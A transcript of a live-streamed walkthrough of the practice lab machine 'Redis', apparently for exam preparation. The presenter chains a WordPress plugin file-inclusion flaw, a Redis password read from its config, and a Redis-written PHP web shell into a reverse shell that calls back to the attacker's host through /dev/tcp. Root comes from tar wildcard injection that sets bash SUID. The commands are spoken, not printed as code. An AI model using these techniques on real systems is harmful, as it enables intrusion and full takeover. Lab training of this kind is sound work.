Hey guys, how's it going? This is JD right here presenting a live walkthrough of the machine Redis. So we've got 100 people joining in right now, and welcome everybody to this live session. We're going to be doing this Linux machine, which is a medium machine on PG Practice. And this machine is created by a good friend of mine, Jezeric. So shout out to Jezeric for creating this machine. And this machine involves a few tricks. Um, and I mean, it is not really straightforward. So you have to like really think about a lot of steps. You have to like really um, think out of the box as well, maybe. I guess we're gonna find out about that. But yeah, without spoiling it further, let's just dive right into it. But before that, let me just introduce myself. My name's Janet, aka JD. I am an OffSec student mentor, and I'm assisting students towards completion of their Pen 200 journey. And why only Pen 200? Because that's the course that I have passed till now. If I pass Pen 300, I will be able to assist students for Pen 300 as well. But for now, only Pen 200. Hey, Cyber, no, this is not an AD machine. This is a Linux one. But this is a really cool machine nonetheless. Like I said, this has got like really cool tricks involved. We might need to think out of the box sometimes for a few steps. So definitely not a boring machine. So yeah, without further ado, let's get started. Let's begin with the walkthrough. Now I'm gonna be shutting down my video so that you guys can see the full screen. And my video is not taking up the space. So there I go. And let's begin. So first of all, let's just start by connecting to the VPN file. Oops. Okay, there we go. So I've connected to the VPN, and this is the portal where I've got Redis ready for us right now. So Redis is Redis for us. And let's hit the play button. Yeah, Solid Snake, um, there could be both Windows or Linux, depends what machines are you assigned. So you are going to find out at the moment you're going to take the exam itself. So just going to get this started because I didn't want it to keep the server running for no reason. So we're going to start a fresh server. And while this is being loaded, I'm going to be using a favorite text editor of mine, which is called Sublime right now, right here, as you can see. So this is a really favorite text editor of mine, and I usually use this to keep all my notes. And it is also very straightforward to use at the same time. So So as you guys can see, I've noted down my tune 0 IP of my Kali Linux just for convenience. So let me just see if it didn't change. So 45.208, and that's what we have here right now as well. And we also have the machine started. So let's just roll it. So I'm just going to copy this IP and post this right here for Redis. So this is the Redis IP and this is our Kali IP so that we don't have to copy paste it every time and we don't waste time for unnecessarily reasons. So let's just start with an Nmap scan. So normally what I do is basically use nmap -v and run it in run it in verbose mode. So I'm just going to run it. And right off the bat, it shows me port 80 and 22 open. So we have HTTP and SSH. And let's just keep it going. Maybe we find some other port at the higher end as well. And we have 6379. And if I just Google right now, of course, we're going to find out what this port is. But if we just Google it right now, we can also um, find out which is with what this port really is. So if I zoom in here right now, this port is for Redis, seems like. But of course, Nmap is going to show the results eventually. So I know that there are only three ports open, and it also concluded the scan. So now I can just narrow down my Nmap scan to save some time. So I'm just going to use 6379, and I'm just going to use this Nmap command. So I'm going to save this. I'm going to scan for these three ports right here, 22, SSH, HTTP, and Redis. And I'm going to do a strip scan and a version scan, and I'm going to output this into nmap/redis. And we're going to do this over this IP, which we have been assigned. So yeah, but I've already done the scan, and to save some time, I already did the scan before, and these are the results right here. So as I mentioned earlier, guys, we gonna find out the service name eventually in the Nmap scan, and we have this right here. So port 6379 is for Redis. We have port 80 for HTTP, and we have SSH. So let's just see if you can connect to Redis without any authentication. So we have this. We can use this utility called Redis CLI, and I can just use the -h option and find out how to use this utility. So if I use the help section, it will tell me that -h stands for hostname, which is basically the IP address. So I'm just going to do Redis CLI. So right now, I don't have the password. And I can just see if Redis server is misconfigured without any password. So I can just do auth and maybe info. So it says right here that authentication required, which means we do need a password for Redis. So this so let's just take a look at the service at a later time. So mm, I'm just gonna paste this in my notes, maybe only this part. So I can just paste this in my notes right here so that I don't forget about Redis. Although I won't forget because there are only three services. And let's just go back to the Nmap scan. And we have another port, which is port 80, which is HTTP. And I'm not going to brute force SSH right now because that doesn't make sense if we don't investigate port 80 first. So I'm just going to browse this IP address and see what we have here in the web application. So right here, as you can see, this is just another WordPress site. So we have WordPress right here, guys. And it clearly says welcome to WordPress. And also I can confirm this further by WP admin, and it should show me the login page. So let's go back, and whenever, guys, I see WordPress, I always use my favorite utility, which is WP scan. And okay, let me just read the chat. I think somebody is having some issues. Okay, so I think we are not having the full screen. We cannot see the left edge of your screen. Okay. Yeah, I see the chat now. Just a second, guys. Let me fix it. Is it better, guys? Like, if you can like respond on the chat, if it's much better. I can see Bob just mentioned that it is now a bit better. All right, sounds good. So, okay, sounds good, guys. Thanks for bringing this up. I'm gonna monitor the chat closely now. Apologies for that. Apologies for the delay. Okay, so where were we? Okay, yeah. So just like I mentioned, we have WordPress right here in front of us. Now, I can confirm if WordPress is actually there by you doing WP admin, and it should take me to the WordPress login page. And now that we have the login page, we can confirm that this is actually a WordPress site. And now I can just use my favorite utility. Let me just zoom it further for you guys. All right, I think this should be good. So WPS scan. So this is one of my favorite tools, which basically scans WordPress. And sometimes in WordPress, there could be some outdated plugins, which what WPS can look out for, and it can show me all the plugins which are installed right now. And we can search accordingly if we can take any benefit of the outdated plugin. So now that we have WPS scan, I can just do dash h and I can just take a look. Let me just do WPS scan dash h less WPS scan less. So, yeah. So now that we have this help menu, we can basically check out on how we can mention the URL. So we're gonna use dash dash URL for mentioning the HTTP address. So I'm just gonna note down the syntax. So this is how we're gonna do it. And we want to search for vulnerable plugins. So I can just go down and go down. And so we have this dash E option, which looks interesting. And it has all these available choices. So this is the option that we should choose for now, which is all plugins. So let's choose AP. So I can just mention dash E AP. Let me just check out the chat if there are no more issues. Regarding the API token in WPS scan, um, I don't think that the API token is allowed because it I think it's like I'm not sure, like it should be mentioned in the exam guide, but as far as my knowledge is, the API token is not really allowed, and you don't really need it, because it's like a commercial usage when we talk about the API token. So, but yeah, let's take the WPS API token at the end, and I can give a firm answer at the end of this live stream when we have the Q&A. So yeah, coming back to the syntax. So we have WPS scan dash dash URL, HTTP IP, and we are going to enumerate all the plugins. So let's just do that right now itself. So IP is going to be the Redis IP. And it concluded the scan. So so WPS scan has identified a plugin which is called site editor. And maybe we can use search exploit and see if we get some results. So we have no results, or maybe we can remove this hyphen. And now once we remove the hyphen, we get a few results in itself. And if we go back to the WPS scan output, we can just copy paste this really quick, and we can just paste it into our notes for this machine. So the version is 1.1.1, and the plugin name is Site Editor. And in the search exploit results, we have this candidate right here, which perfectly matches our search, which is WordPress plugin Site Editor 1.1.1 local file inclusion. So let's upload this in the current directory, and we can read this proof of concept, and let's just find out what the site editor plugin does actually in WordPress before we go right into it. So as you guys can see, using the site editor, we can basically design everything on the WordPress site using blocks. So this is basically a quick description, and it basically allows us to, I think, basically helps with the design, I guess, on the front end. So we have this sidebar, which is like an additional feature while using this plugin. No, I don't think it's like a text editor. It's kind of like a tool for designing your WordPress site. So WordPress is basically a CMS, and a CMS stands for Content Management Software. So WordPress is basically a platform where you can manage your content. And when you have to manage your content, you do need some plugins which can guide you with designing the front end and make the content look more appealing. And I believe that's what this plugin is meant for. So yeah, that's what I think this plugin is for, which is basically to turn up the appearance of your content of the front end of the WordPress page. And so right here, as you can see, there's like a video as well. So I'm just gonna paste this. Yeah, Dark Passenger, that's the thing. So I'm just gonna paste this link because there's like a video as well which explains what this plugin does. So as an extra mile exercise, you can definitely refer to the video. So now we have site editor, but it is kind of outdated, guys. And we do have a matching exploit for this version, because we have this version right here running in this WordPress website, which is 1.1.1 and site editor. So this is the vulnerable code. So basically, it is requesting the Ajax path, and uh, the Ajax path variable seems like this is the vulnerable parameter where the local file inclusion lies. And this is the proof of concept itself. So basically, it will first locate the plugin, which is WP content, and we see plugin right here, and we have the site editor plugin directory, and we have all these directories, editor, extensions, page builder includes. And at the last, we have this file called this Ajax shortcode pattern.php, which contains this code, this vulnerable code right here. And it is requesting the file, which is basically a file, and this is requesting a file through this parameter. And we can basically include files through this Ajax path parameter as seen in this vulnerable code right here. So let's just use this POC, and I can just do curl and put it inside single quotes, and I can just replace the Redis IP. So let's see if we have a local file inclusion right here, and we surely do. So now we have something to work with, guys. And we have local file inclusion with us, and we can read local files. And right here, we can read SC password. So I can just copy paste the last two lines of SC password. So we have we have only one user logged in right now, which is Alex, and she has her own home directory. And I don't see any other users, so I'm just gonna conclude that Alice is the only user logged in right now. So I'm just gonna um, do logged in user Alice. So just for my personal note, so that I don't have to refer back to the output again and again. So whenever I have LFI, guys, I always tend to refer to some LFI word lists. But let's just do this manually without any automation. And let's just try to understand what we are doing instead of just running a random word list. So right now we can just use LFI to, first of all, uh, see if we can read the SSH keys under the home directory of Alice. So let's see if we are lucky, although I highly suspect that we won't be lucky. So I'm just going to do IDRSA, and we don't have anything. Maybe we can search for DSA, but I don't think we have the permission to look under the home directory of Alice, because we are this WordPress is being ran as the www data. And I think for those reasons, we won't be able to read the files under the home directory of Alice. And next up, what we can do is maybe check the Apache config. So let me show you guys where the Apache config is in my local Kali. So I can just do SE Apache 2 sites enabled and 000 default.conf. And I can just do cat. So this is basically how an Apache config looks like. And this config basically contains like the different virtual hosting, if there is any. So for example, if I decide to host two virtual hosting, I have to mention that in this config. But let's see if that's the same case in this case in Redis. So I'm just going to use curl and see if and I'm just going to do less. So this is so as you can see, this is success, and we have the Apache config right here. And this is the same as my Kali, and they only have one hosting, which is this WordPress right here running. So they don't have any hidden web page under any other virtual hosting. Maybe they could be having some other virtual hosting at maybe let's say web2.redis.com. So there could have been another web page behind this virtual hosting, but luckily there isn't anything like that in the target. And we can find the document root. So this is where this WordPress instance is being hosted. And yeah, so seems like we don't have anything right here. So let's take a look at our Nmap scan. And let's just take a look. So we did our investigation for SSH and try to find any interesting um, any SSH keys, but we were unable to find any private keys. So let's just cross SSH off, and we are dealing with port 80. But now what we can do is basically check for something which is related to Redis file through LFI. So I'm just going to use Google for this one, and I can just do Redis config file location. And maybe I can just mention Linux. And so this is like a Stack Overflow post, which basically mentions a potential file location for Redis. And the config file is named redis.conf. And the user here is saying that we can probably find our Redis configuration directory, probably, which is under se/redis. And config file is named as redis.conf. So let's just try using this Stack Overflow post and see if we can maybe find something .conf. So it seems like this Stack Overflow post is quite accurate for our case right now. And yeah, Dark Passenger, that is really a good point. So let me just let's check out if we can read the logs, and maybe we can do some log poisoning, which I believe the author might have blocked this because it shouldn't be that easy. So we can just do var log Apache 2. Let's just see which is the file location. So I can just use my Kali itself. I don't have to Google every time. So we can just do var log Apache and access log. So this is the file location. And I can basically now just paste this file location and see. So it says false. That means we don't have potentially the permissions to read this file. And maybe we have the permissions to read error.log like Dark Passenger just suggested. But this is a dead end as well, because probably the user www.data, they don't have the permissions to view this file. And that's why probably we cannot see this file. Otherwise, we could have poisoned the logs and we could have gotten our remote code execution. But this is not the case in this machine. So let's just continue our research for the Redis config file. And we can probably output it into we can just use dash output and just do redis.conf. And now we have redis.conf copied down. And we can see that a lot of lines are commented right here, as you guys can see. So maybe we can just use some bash tricks and remove the comments. So we can just remove hash, and this will only give us the trimmed output. And maybe we can just grep for pass, grep I pass. And looks like this trick works for us. So let me just do it right here again. Let me just zoom in. And if I grab for pass or password, it wouldn't have done it. But if I grab for pass, it shows me, or even if I scroll this upwards and just analyze this manually, I can just see this line which is called require pass. And this is probably the Redis password, which is ready for Redis question mark. So now that we have this information, we can just copy paste it, and I can just save this into my notes right here really quick. So we have the Redis password. And now, most probably, as we have the Redis service right here on 6379, we can try connecting to the service again using Redis CLI. And as we researched before, we can just use -h. And maybe I can just take a look at the help menu again and see if you can use the password on the bash syntax itself. So I'm just gonna take a look and see if you can do anything. So -h is for hostname and -p is for port, which is default 6379. So we don't have to mention -p. We don't have to mention socket as well. And this is the flag that we are looking for, which is the password to use when connecting to the server. So we can use -a. So now let's use -a and copy the address and copy the password. So ready for Redis. And let's see if it works. So it did connect us in. And if I do info now I can see this entire output, which I was not able to see before. So that means that we are successfully authenticated to Redis using local file inclusion. And what to do next is the million-dollar question. So let's just note down our findings that we now have access to Redis and we have LFI. So now we have to combine both these. Now we have to combine our access to Redis, and we have to combine local file inclusion, and we have to see on how we can get local file inclusion. How we can get remote code execution and a reverse shell through the combo of Redis and LFI. Now let's just go back to Google and let's just do some let's just do some OSINT and let's see if Google can help us. So I can just do Redis um, Redis exploit. So right here we can see that we have this favorite blog of mine, which is called Hack Tricks. And let's see if this blog post has something interesting for us. So we have this automatic enumeration. So, but I'm not going to use that. We're going to do everything manually, guys. So let's see. So this is the basic stuff about how to connect to Redis. And so maybe we can just try PHP web shell, which looks promising. So what this is doing right here is basically it is setting a directory, and then it is dropping this PHP file, and it is also dropping the contents into the PHP file itself using Redis. And now through this technique, through this feature of Redis, we can probably combine the same with LFI, and we can catch a reverse shell. So let's see how we can do that. But first, the major challenge lies in finding the writable directory. So I'm just gonna start with the basic stuff, which is basically I'm just gonna open a new terminal. And if I take a look at the LFI, which we used before, or I can just cancel this itself. So I can just do, I should have pasted the payload here. So let me just paste the payload for our convenience. So this is one thing I forgot to take down in my notes. So I can just, for my for my own convenience, I can just paste this command right here, and I can just copy paste it when I need it. So I can just do curl, and let me just reestablish LFI like before. And let's take a look at the Apache config like we did before, because it did had a directory for us, which was the web root itself. So default.conf, and I can just save this into Apache con.conf. So if I check this Apache config file, it has a document root for us, which is var/html. So maybe we can start with this directory itself and see if we are lucky and we can write under this directory using Redis. So I can just go down to my history and I can connect to Redis again. And I can just go back to this page and I can just do config set dir. So I can just do var html, and I can then do config set db file name, which is basically our PHP web shell. And I can, next up, I can do set test, but not for PHP info because we want to get a remote code execution. So I'm just going to load a web shell of mine. So PHP, and I'm just going to do system, and I'm just going to do get and cmd and semicolon. So set test. So this is our web shell um, right here. So we're just gonna use the get parameter, and we can just use the cmd in the get parameter, and we can just run any commands that we want at the same time. So I can just do set test, and let me just try hitting save. So it is showing me an error right now. So that means we do not have, I mean, the Redis service itself doesn't have permissions to write under this file. And probably that's why it's giving me an error. So maybe we can just research on which file we can use. So maybe we can probably use uh, maybe etc Redis itself. Maybe we have permissions under this file because under this directory because this is where we found the Redis config. So let's see if we have permissions to write under SE Redis. So I'm just going to do config set SE Redis, and I'm just going to do db file name set. I'm just going to set my PHP web shell. Okay, let's just do it from the start. So I don't know what that. Maybe we can choose another uh, PHP file, and that should do it, but it is giving an error as well. So let's see what else we can do. So I believe this error is basically based on this directory. Hmm. So now we have to research on what directory we can write into. And yeah, that's correct. So we can definitely put this in quotes. And now we have to research. Now we have to, I believe what we have to do now is basically use LFI and research for the writable directory. And maybe the next idea that I'm getting right now is to check the service config file of the Redis itself. So mostly the service files are located under sc systemd system. And as you guys can see, all the services files are located here. And they can also provide a great deal of information about a service. So maybe we can just choose the redis.conf.service. I believe this is how it should be named. So let's see if that is the case. So I'm just going to go right ahead and see if we can do something. So redis.service, and let's see if we have the service file with us. So we do have it, and some of you might be having a question that how did I got an idea? Well, I just take a look at my own Kali and how the services files are saved in my own Kali, and that's how I thought about the same as well. So in this file, maybe we can get some good amount of information. So as you can see, it is mentioning a lot of variables and read-write paths. So while Redis, so this is just talking about the path. And if you go down and down, it now talks about some modules, and these are some commented lines. And right here, we have something interesting, which is read-write directories. So this seems like something which we can work upon. And we have already tried SE Redis and we failed. So now we can try this last hope that we have through this file. And I can just use this command again. And yeah, so now we can just redo all these steps. And we need to use let me just go back and save it into my notes. I always keep forgetting about it. And this is something you don't want to do, guys. Don't make this mistake of not saving it into your notes. So now I don't have to go back again and again for grabbing the same information which I saw earlier. So let's just see if we can do something with this one. So config set dir. So it says okay. And config set db file name. We can do rce.php. And then we can do set test php system. And we can basically, I'm just going to copy paste the web shell itself. I can just copy paste this itself, and I'm just going to set test. So now I can hit OK save, and let's hope that it works for us. So it says okay. So this is promising right here. And let's see if now we are able to include this file, which has been saved under opt Redis files. So I'm just gonna quickly grab this curl command, which I saved in my notes. So hopefully I'm teaching you guys some of that note saving benefits as well. And I can just use this directory and rce.php. So it seems like we do have some output, but it's saying that we need to use this parameter so that it doesn't mess up your terminal. So I can just do it by coming up in the front, and I can just mention output. Okay, so we do have something. So it seems like this PHP file did got uploaded on the box, and we are able to include this file as well. But remember, guys, we did created this file as a web shell. So what here we can do is basically do an and cmd is equal to id. And as you guys can see, we have remote code execution now, and we can execute commands on the machine as well. So let's just turn this into a reverse shell now. So I'm just going to split my terminal. I'm just going to press Control plus Shift plus R. And I can just split my terminal like that. And I can just do, first of all, let me just prepare a reverse shell. But let me just see how we can do it horizontally instead. So we can just do it. Okay, I'm just going to cancel this, and I'm just going to do horizontally instead. So, okay, this is messing up my terminal. So let's just do it like this. First, let's set the payload, and then we can maybe do it. Okay, I just need to reset. Okay, so now what we can do is basically use some of that curl functionalities. And I'm just gonna let curl URL encode my payload itself. So we can do -g, which stands for get request. So let me just first write up the syntax, and I'm just gonna explain to you guys on what did I do. So I'm just gonna do data, and I can just do ajax path. So right now, what I just did is basically I mentioned -g, and this is indicating curl to use this data, which we have mentioned in this flag, on the get parameter, which is on the get side. And this is how we can basically use some of these curl features, and we can provide ourselves some convenience. So now, for me to obtain local remote code execution, I can just go back to my RCE web shell, and I can basically do and cmd is equal to, and this is where we need to mention a payload. So for the payload, we can obtain a reverse shell using a lot of methods. Like, there are endless opportunities. And one of my favorite sites are refshells.com. So I can just come up here, and I can just grab the IP address of my Kali, and I could just paste it right here. And I can also choose port 80 to catch the reverse shell. And I can use plenty of these reverse shells right here. So I'm just going to use the most liked, which is NC, which is MKFIFO. This is like really effective in most of the architectures, and it always works. It never fails, in my opinion. Yeah, so we can just do it like this, but guys, we need to URL encode this entire payload. So what I can just do is basically come up here and I can just mention this instead, which is data dash URL encode. And what this is going to do is basically in URL encode this entire thing, and curl is going to do it itself. So I don't have to go to my Firefox. I don't have to um, go to a URL encoder and do it myself because uh, curl utility will do it for myself itself. So now I can just split my terminal and I can do nclvnp and I can just press enter here. So it says didn't load the shortcuts. So I think I did something wrong. So let's see what we did wrong here. So we mentioned all right, so we mentioned this part right here. Let's see what mistake I did. ID. Okay, so I did some mistake for sure. Okay, yeah, I did a terrible mistake. Yeah, I did like a really terrible mistake. So I can just do this again. So I can just copy paste this itself, Ajax path, and CMD ID. Let's just see if it works. Okay, so this works. So now I can just use this payload again, and I can just copy paste it under CMD. And if I do it right now, and if I do it enter right now, it won't work. So this error right here is asking me to URL encode it. So we're just gonna do the same stuff right now itself. So I can just come back and I can add URL encode, and I can just open another window and I can just press enter. And again, seems like it doesn't like this output really a lot. Let me just see if I'm using the right syntax. No, it is not being URL encoded if I don't mention this flag. So seems like it is not liking a few of the characters. So maybe I can just use something else. It doesn't really like the special characters that I'm putting in for some reasons. So maybe we can just build our own web shell. So maybe we can do bash I greater than n. So we can just do equal bash I and greater than def TCP. And I can do my IP address, which is 45208 and 80 0 and 1. So base 64. So let's just see if this trick works, and we can automate this. So we can just do echo dash n, and we can just pipe it to base 64 decode, and we can just do bash, and probably this might work. Seems like it's not really liking the data I'm giving it right now. and I don't know for what reason. Let me just do it in code myself, see if I'm doing the right stuff. So I'm just gonna URL encode it myself for the moment and see if it works. Okay, so it works. It works like that if I do it in this way. But seems like the data URL encode is not really liking the characters I'm putting in, which was really unexpected. So yeah, so this is basically how we can get RCE. So what I just did is basically used a payload. So this is the payload which I used right here, a decode. So we just did echo-n, and this is the base64 version of this reverse shell, which is basically the same one, IP-80. So this is the base 64 version of this payload right here. So what I just did is basically um, encode this output, and I piped it to base 64 decode, and I piped it to bash. So this is a little bit trick in case you guys are stuck with an application which doesn't like special characters. So this is a small trick that you guys can use in case you are stuck a very uh, with a very tough web application. So this is one trick which you guys can note. Yep, we could have done that, but I just wanted to show my own personal favorite reverse shell as well. So yeah, so now we have the shell. And whenever I get a reverse shell, first of all, the first thing I do is basically upgrade the shell. So I'm just gonna, first of all, go to the home directory, and I'm going to use Python, and I'm just going to import pty.spawn, and I'm going to do bash. So then I'm going to hit Control plus Z, and I'm going to do straw echo. And since this is bash, we can just do enter and FG, enter, enter. So now we can just clear it, but first we have to set the environment. So we can just do export term is equal to xterm. And now we can clear it. And also additionally, guys, I would definitely set the rows and columns so that the terminal doesn't get messed up. So now I can just type how much I want to type. So now it won't run out of spaces, just like it usually does. And I can also cancel, and I have an attractive shell right now. Yeah, the plus sign could have been an issue, but I was expecting curl to URL encode it itself. Um, but it's okay. We can just do it manually. Uh, no automations. And now that we use reverse shell and upgrade reverse shell, we can also check out what files we have. And we have this local.txt file. So we can definitely cut it. But this is not what we are here for. We are here to learn. So let's just ditch the flag for now. And seems like we do not have the SSH directory. So maybe we can create an SSH directory, and we can SSH from our Kali itself. And for that, what I can just do is basically create the SSH directory by myself. So make dir ssh.ssh, and I can just browse into SSH, and I can do touch authorized keys. So now that we have created this authorized keys file, I can drop my own private key now. So I can just do .ssh id .pub. So this is my public key, and I can basically just echo this public key into authorized key files. So now the authorized keys and the target looks like this. And now I can just SSH into the server. So let me just grab the IP real quick. So I can just do it like this, and I should be able to SSH. And there we go. We are able to SSH. But in case you guys are not able to SSH sometimes and it asks you for the password, don't worry. You can just simply do chmod 600 authorized keys and chmod 700 on the SSH directory. And then you should definitely be able to SSH into the target. Yeah, so now that we have the SSH session with us, we have a more stable shell now. And now we can just proceed with our usual enumeration, which is sudo l. And it's asking me for a password, which I don't have. So I'm just going to cancel it. And I can also do the environment path. Right here, we also have nothing. And we can, we don't have really have anything in the under the home directory, which we can, maybe we can do bash history, but it's set to def null, so it must be empty. So there's nothing down here as well. Bash RC is the profile, so there's nothing to find here, most probably. Maybe I can just look under opt for any interesting directories, and we do have these two directories right here. Yeah, don't mess with the private key. So we have these two directories right here, which is backups and Redis files. So we can just go under opt, and we can just check with under Redis files. So this is basically our own reverse shell, the own web shell, which we put to use it and get a reverse shell. So this is nothing new. And you can also look under backups, but permission denied. So we don't have permissions to look under the backups directory. So the permissions are like, so only root can basically read and write, and we have no permission for others right here. So this is a dead end as well. We can check for any interesting directories under. Yeah, we do love our backups for sure. So yeah, coming back, we don't have, we checked the home directory, we checked under opt, we can check under media because it looks a bit interesting. Oops, so I need to maybe media, but this is a default directory and there's like really nothing. So I don't see anything of use. Maybe the next phase of enumeration that I can do is check out, maybe we can check out the group membership. Something might be interesting down there, but we do not have really interesting groups. We can also check the groups in the ID command as well, but we don't have anything interesting. And what else can we check? Any suggestions? What other users have interesting files? So we only have one user with us right now, which is Alice. So there is no other user to check the files in there. So I'm just gonna follow the next suggestion, which is the cron. So that is a really good suggestion, Knuckleberry. So let's check out the cron tab. So I think we can also do it like, um, I think using the Alice command, no cron tab for Alice. Maybe we can just cat the cron tab itself, and that was a great suggestion, Knuckleberry. Thanks for that. And we do have something interesting which is going on under the cron tabs, and this is basically executing this backup file in every 3 minutes, I believe. And let's check this out, see if this file is readable for the user Alice. And we have this bash script with us. So right now, let's go through this script line by line, guys. So first of all, what this script is doing, it's going under var www.html, and then it's doing this condition. And let's see what basically this command stands for. So let me use this favorite website of mine, and I can just paste this command right here. So this website basically explains the command, the entire command which we just pasted. So definitely find is basically searching for files in the current directory, which stands for dot. So it is basically searching for files under var www.html. Yeah, Knuckleberry is right. You are on point. So yeah, let's just go through this condition first. So it is searching for files under the current directory, and the type is F. So F stands for regular files. So it's just searching for regular files under var www.html and MMIN. What does this stand for? So this basically stands for files data was modified n minutes ago, which in this case is 3. And this is basically going to count the number of files which are created under 3 minutes ago recently. And it should be greater. So GT stands for greater, I believe. So let's just run this command, and let's just go to var www.html for me to demonstrate this practically. So right now, let's just search for, let's just remove GT0, and let's just see what does this do. So as we can see right here, maybe we can just, so that was like part of the if statement, so that's why it's not working right here. It shows that it is an invalid option. So as we can see that if we run this command right now, it's going to show 0 because there have been 0 files which were modified within the last 3 minutes. But now if I create a file which is called maybe test, and now if I run this command again, it's going to show 1 because we just created this file in the last 3 minutes, and that's why it's showing 1. And we can just similarly do this to prove this further, and it's gonna show 2 because there are 2 files which were modified and created within the last 3 minutes. And similarly, we can just do test 3, and 3 files are now modified. So I can just delete this because we have proven our point. And let's go back to the script again. And let me just scroll down to my history. So let's just go this line by line. So it is going under this directory, and this is launching an if statement that if there are any files under this directory which were modified within the last 3 minutes, and if it is greater than 0, then the tar command will be used to back up the entire files which were created within the 3 minutes. But now we have this wildcard with tar, which gives us which we can leverage. And with with a suggestion from Knuckleberry, I can just do tar wildcard exploitation, tar wildcard exploitation, and we have all these blog posts which are dedicated to this single attack vector. So we can just go ahead and check out the first blog post itself. So if we scroll down, it is discussing about the first method. So this is talking about creating a shell.php file, shell.sh file with our reverse shell payload. And it also creates this file, which is named checkpoint action. Now, what exactly is this? So for us to understand this, we need to check the help section. And so uh, this is the argument which is present with the tar utility, which we can use. And the same thing is being indicated here itself. So we need to create two files with these names. And because of the wildcard, it's going to treat these file names as the argument itself. So once tar runs, because of the wildcard, it's going to include these files which were created. So it's just going to be like simply like this. And it's going to be like this. So because of the wildcard, it's just going to take these file names and it's just going to treat them as arguments. And this will basically force tar to execute this as root. So I hope that made sense, guys. And now what we can basically do is basically echo bin chmod. I'm just going to do the I'm just going to first of all, I'm just going to copy bin the bash to temp bash. So first of all, I'm going to copy bin bash to temp bash. I'm just going to create a duplicate of the bash binary. And I'm going to follow this blog post, which is to basically, I'm just going to chmod 4755. And this will basically turn bash into an SUID. And we can also do u plus s, but I prefer doing 4755, and we can just do bin bash. Or in our case, since we created a duplicate, we can just do temp/bash. And we can do it we can pipe this output to shell.sh. And we can then just create this file, which is shell.sh. And we can create this another file, which is echo/checkpoint. So now what we can do is basically go to my toolkit, and I can upload TSPy and monitor the process, and we can get to know when the tar command is being ran. Oops, that is a typo. So I can just do 192.168.45.208. I believe this is the IP address which I'm using, and PSPy 64, output PSPy. So first of all, what I have to do is basically chmod plus X to PSPy, and now I should be able to run PSPy. So PSPy should tell us when the tar command will be executed, and once it gets run, we can confirm that our binary has been, our bash duplicate has been turned into an SUID, into a set UID basically. So I guess we just have to wait and see whenever the cron gets ran. So it should be any time now. In the moment, maybe we can check if maybe it was indeed executed. Okay, so I don't know why it's spamming this huge output, but if we look closely, it did ran this tar command because of the cron tab, and it did executed our shell.sh as UID0, which means uh, which means now we should be having this as SUID, and definitely we do. It's now listed as an SUID, and now we can just do temp/bash-p, and I don't know why it's not working. Maybe it should work. Mm, maybe we can try bin chmod 4755 bin bash itself, shell.sh. Yeah, 4755 should work. I did it previously and it did work. I'm not sure. Interesting. So I guess we just have to wait for our next cron job to happen. Let's see if this has been turned. Maybe what I can do, just for the sake of fun, I can do dash plus s as well, and I can put this in the new line, chmod plus s, bin bash shell.sh. So both of the commands are going to get executed, but should be the same case nonetheless. So yeah, right now we see that it ran again, and now hopefully it should work. Okay, it works, but I'm not sure why it didn't work with bash-p, but it does works with bin bash itself. So we've got root guys, and we can now just check out the proof.txt file, but as I mentioned, we are not here for the proof lat. We are here to educate. So that was it, guys, for the walkthrough. And now it's time for the flash. So can you guys hear me now, I believe? Okay, so yeah, just before you guys log off Twitch, there's this flash quiz which we are having right now, and whomever who don't have a Proving Ground subscription, they can stay tuned and they can basically play this quiz right now. And we can basically we are awarding a free Proving Ground subscription for whomever they answer the question first. So um, I'm sure there must be many people who do not have a Proving Ground subscription. So um, stay tuned. So just stay with the chat, stay with the stream, guys, and don't leave for now. And of course, if you have any questions regarding the stream, uh, regarding any step, we also can take it up right now as well. Okay, we have some people who do not have a free Proving Ground subscription. So yeah, let's play the quiz. Okay, so I think we have a winner. The first response was from, um, let me just scroll. It was from Matthias Loaf. Uh, they answered the question by mentioning, which is basically update WordPress plugin. And of course, whitelisting Redis is also a great option as well. But definitely the first step starts with updating the WordPress plugin. And they answered the question first. So definitely they win a free PG Prague subscription. So congratulations to Matthias. So that's how it's gonna go, guys. I'm just gonna look for the first response, whoever responds with the first question. Yeah, so someone will basically reach you out from our team. Matthias. We will basically DM you on Twitch or Discord. Yeah. Okay, so I think Tricky's response is similar to the answer, which is basically to use least permissions on the backup script so that Alice is not able to read it. So I think that is an appropriate response to the question. So I don't see any other response which is close to the answer. So I guess we can avoid Tricky, the proving grounds subscription because yeah, that's like the closest answer. So basically, we can use like we can remove the read write privilege over the backup script for Alice, and that way she is unable to read it. And of course, we can also fix the tar. We can also remove the wildcard as well from the tar utility. So this is a trick question, guys. So except log poisoning, what do you think? I'm excited for some answers. Yeah, but Matthias, you have been already awarded a free proving ground, so maybe let others, maybe let others win some subscription as well. Okay, I might look into that tool myself. So hmm, yeah, that is really an interesting tool, to be honest. Okay, yeah. So I think we can avoid the I think we can avoid the next subscription to plant versus tree. because yeah, wrappers are a good way to obtain remote code execution through LFI.